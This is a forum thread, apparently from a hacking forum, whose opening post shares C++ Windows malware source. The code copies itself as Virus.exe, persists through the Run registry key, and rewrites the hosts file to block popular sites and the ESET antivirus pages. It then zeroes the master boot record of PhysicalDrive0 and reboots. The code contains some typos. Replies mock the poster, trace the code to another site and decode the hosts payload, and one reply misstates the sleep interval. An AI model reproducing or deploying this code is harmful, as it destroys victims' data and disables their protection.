Author Topic: Overwrite the Masterboot Record [C++] (Read 755 times)

Jeirox · « **on:** January 03, 2015, 10:55:50 pm »

Code: (cpp) [Select]

#include <Windows.h>
DWORD WINAPI CheckTime(){
    DWORD write;
    SYSTEMTIME st;
    char data[512];
    ZeroMemory(&data,sizeof(data));
    GetLocalTime(&st);a
    if(st.wYear==2014){
        HANDLE disk=CreateFile("\\.\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
        WriteFile(disk,data,512,&write,NULL);
        CloseHandle(disk);
        ExitWindowsEx(EWX_REBOOT,0);
    }
    return 0;
}

DWORD WINAPI hosts(){
    char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
    char path[60];
    DWORD write;
    GetEnvironmentVariable("windir",path,sizeof(path));
    strcat(path,"\system32\drivers\etc\hosts");
    HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
    WriteFile(hFile,data,sizeof(data),&write,NULL);
    CloseHandle(hFile);
    return 0;
}

DWORD WINAPI reg(){
    char value[]="Virus.exe";
    HKEY hKey;
    while(1){
        RegCreateKey(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",&hKey);
        RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60);
        RegCloseKey(hKey);
        Sleep(10000);
    }
    return 0;
}

int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
    char file[MAX_PATH];
    char path[60];
    HANDLE hToken;
    LUID luid;
    LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
    TOKEN_PRIVILEGES tp;
    tp.Privileges[0].Luid=luid;
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    tp.PrivilegeCount=1;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
    AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
    GetModuleFileName(NULL,file,sizeof(file));
    GetEnvironmentVariable("windir",path,60);
    strcat(path,"\Virus.exe");
    CopyFile(file,path,false);
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
    while(1){
        CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
        Sleep(10000);
    }
    return 0;
}
}

Kulverstukas · « **Reply #1 on:** January 04, 2015, 09:35:59 am »

At which line does it overwrite the MBR? because all I see it does it check the registry and write some data into hosts file, kek. Also post from where you copied this garbage from, also more info needed.

I give you a day before it's removed.

$Clone · « **Reply #2 on:** January 04, 2015, 10:34:14 am »

I see some resemblance of code in:
http://www.rohitab.com/discuss/topic/39459-my-c-virus/

Kulverstukas · « **Reply #3 on:** January 04, 2015, 10:47:11 am »

Yeah it's the same code... shame on OP for not mentioning where he copied it from.

madf0x · « **Reply #4 on:** January 04, 2015, 06:39:41 pm »

for the curious/lazy it writes out:

Code: [Select]

www.youtube.com 127.0.0.1
www.google.com 127.0.0.1
www.yahoo.com 127.0.0.1
www.facebook.com 127.0.0.1
www.microsoft.com 127.0.0.1
www.eset.com 127.0.0.1
www.eset.eu 127.0.0.1
en.wikipedia.org 127.0.0.1

which means as a whole this code overwrites the host entries of a few popular sites to localhost, sets up a regkey to autostart(with hardcoded file name, instead of grabbing its own), and checks if the current year is 2014, if so attempts to overwrite .\PhysicalDrive0 with zeroed memory. Waits 10,000 seconds before checking the time again.

d4rkcat · « **Reply #5 on:** January 05, 2015, 05:48:59 pm »

Quote from: madf0x on January 04, 2015, 06:39:41 pm

for the curious/lazy it writes out:

Code: [Select]
www.youtube.com 127.0.0.1 www.google.com 127.0.0.1 www.yahoo.com 127.0.0.1 www.facebook.com 127.0.0.1 www.microsoft.com 127.0.0.1 www.eset.com 127.0.0.1 www.eset.eu 127.0.0.1 en.wikipedia.org 127.0.0.1
which means as a whole this code overwrites the host entries of a few popular sites to localhost, sets up a regkey to autostart(with hardcoded file name, instead of grabbing its own), and checks if the current year is 2014, if so attempts to overwrite .\PhysicalDrive0 with zeroed memory. Waits 10,000 seconds before checking the time again.

LOL pwned.
Thanks madf0x.

EvilZone

News:

Author Topic: Overwrite the Masterboot Record [C++] (Read 755 times)

Jeirox

Overwrite the Masterboot Record [C++]

Kulverstukas

Re: Overwrite the Masterboot Record [C++]

$Clone

Re: Overwrite the Masterboot Record [C++]

Kulverstukas

Re: Overwrite the Masterboot Record [C++]

madf0x

Re: Overwrite the Masterboot Record [C++]

d4rkcat

Re: Overwrite the Masterboot Record [C++]